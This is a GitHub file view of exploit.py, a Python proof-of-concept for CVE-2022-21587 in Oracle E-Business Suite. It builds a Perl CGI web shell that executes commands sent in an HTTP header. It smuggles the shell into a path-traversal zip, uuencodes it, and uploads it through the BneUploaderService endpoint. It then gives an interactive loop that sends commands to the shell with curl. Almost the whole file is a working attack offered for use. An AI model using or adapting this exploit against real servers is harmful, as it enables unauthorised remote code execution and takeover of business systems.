-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathexploit.py
54 lines (48 loc) · 1.47 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/python3
#POC by HMs
#CVE-2022-21587
import requests
import os
import sys
shell = '''
use CGI;
print CGI::header( -type => 'text/plain' );
my $cmd = CGI::http('HTTP_CMD');
print system($cmd);
exit 0;
'''
def Write_Shell():
with open("txkFNDWRR.pl", "w") as f:
f.writelines("%s \n" %(shell))
os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl")
os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")
def exploit():
Write_Shell()
host = sys.argv[1]
if host.endswith == '/':
url = host + 'OA_HTML/BneUploaderService?bne:uueupload=true'
url_shell = host + '/OA_CGI/FNDWRR.exe'
else:
url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true'
url_shell = host + '/OA_CGI/FNDWRR.exe'
file = 't.uue'
up = {
'text':(file,open(file, 'rb'),
"multipart/mixed"
)
}
request = requests.post(url,files=up)
if request.status_code == 200:
print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')
print('`press q || Q || quit to exit !!!` \n\n')
print('`exploit: python3 http|https://example.com` \n\n')
while True:
cmd = input("~shell[~]: ")
if cmd == 'q' or cmd == 'quit' or cmd == 'Q':
break
else:
os.system("curl -ks '%s' -H 'cmd: %s'" % (url_shell,cmd))
else:
print('not vuln!')
if __name__ == '__main__':
exploit()